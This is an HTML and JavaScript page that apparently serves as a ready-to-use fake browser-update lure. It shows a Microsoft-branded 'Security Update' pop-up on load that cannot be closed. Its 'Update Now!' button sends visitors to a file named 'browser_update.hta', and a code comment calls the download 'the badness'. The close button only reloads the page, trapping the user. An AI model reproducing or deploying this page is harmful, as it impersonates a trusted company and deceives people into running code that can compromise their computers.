<!DOCTYPE html>
<html>
<head>
<style>
/* The Modal (background) */
.modal {
    display: none; /* Hidden by default */
    position: fixed; /* Stay in place */
    z-index: 1010; /* Sit on top */
    padding-top: 100px; /* Location of the box */
    left: 0;
    top: 0;
    width: 100%; /* Full width */
    height: 100%; /* Full height */
    overflow: auto; /* Enable scroll if needed */
   /* background-color: rgb(0,0,0);  Fallback color */
   /* background-color: rgba(0,0,0,0.4);  Black w/ opacity */
}

/* Modal Content */
.modal-content {
    position: relative;
    background-color: #fefefe;
    margin: auto;
    padding: 0;
    border: 1px solid #888;
    width: 60%;
    box-shadow: 0 4px 8px 0 rgba(0,0,0,0.2),0 6px 20px 0 rgba(0,0,0,0.19);
    -webkit-animation-name: animatetop;
    -webkit-animation-duration: 0.4s;
    animation-name: animatetop;
    animation-duration: 0.4s
}

/* Add Animation */
@-webkit-keyframes animatetop {
    from {top:-300px; opacity:0} 
    to {top:0; opacity:1}
}

@keyframes animatetop {
    from {top:-300px; opacity:0}
    to {top:0; opacity:1}
}

/* The Close Button */
.close {
    color: white;
    float: right;
    font-size: 28px;
    font-weight: bold;
}

.close:hover,
.close:focus {
    color: #000;
    text-decoration: none;
    cursor: pointer;
}

.modal-header {
    padding: 2px 16px;
    background-color: #F70202;
    color: white;
}

.modal-body {padding: 2px 16px;}

.modal-footer {
    padding: 12px 16px;
    background-color: #FFFFFF;
	height:65px;
    color: white;
}

/*The Update Now button */
.updatebutton {
    background-color: #008CBA;
    border: none;
    color: white;
    margin: 0 auto;
 text-align: center;
    position: relative;
    padding: 15px 32px;
    text-align: center;
    text-decoration: none;
    display: inline-block;
    font-size: 16px;
    border-radius: 4px;
    box-shadow: 0 12px 16px 0 rgba(0,0,0,.10), 0 17px 50px 0 rgba(0,0,0,0.10);
}

.updatebutton:hover{
box-shadow: 0 12px 16px 0 rgba(0,0,0,0.24), 0 17px 50px 0 rgba(0,0,0,0.19);
cursor:pointer;
}

.h2 {
font-family: Trebuchet MS;
}

.microsoft{
font-family: Trebuchet MS;
font-size: 11px;
color: black;
padding-bottom: 10px;
}

</style>
</head>
<body>

<!-- The Modal -->
<div id="myModal" class="modal" data-keyboard="false" data-backdrop="static">

  <!-- Modal content -->
  <div class="modal-content">

    <div class="modal-header">
      <span class="close">&times;</span>
      <h2 class=h2 style="font-size:32px;">Security Update</h2>
    </div>

    <div class="modal-body">
      <p class="h2" >We have detected that your web browser is out of date. By updating your browser to the most recent version , you can be assured that you get the most up to date protection and product support.</p>
      <p class="h2" >Please download the latest version now to continue</p>
      <p> <button class="updatebutton" onclick="download()">Update Now!</button> </p>
    </div>

    <div class="modal-footer">
      <h3></h3>
	<img src="Microsoft_logo.png" height="20px" width="100px">
	<p class="microsoft">The Microsoft Corporation encourages you to update your computer on a daily basis. Visit <a href="javascript:window.location.reload()">microsoft.com</a></p>
    </div>
  </div>

</div>


<script>
//Download the badness!
function download() { window.location.href="browser_update.hta";}

// Get the modal
var modal = document.getElementById('myModal');

// Get the <span> element that closes the modal
var span = document.getElementsByClassName("close")[0];

// When the page loads, open the modal 
onload = function() {
    modal.style.display = "block";
}

// When the user clicks on <span> (x), keep reloading the page ;)
span.onclick = function() {
    window.location.reload()
}

// When the user clicks anywhere outside of the modal, keep reloading ;)
window.onclick = function(event) {
    if (event.target == modal) {
        modal.style.display = "block";
    }
}
</script>
</body>
</html>
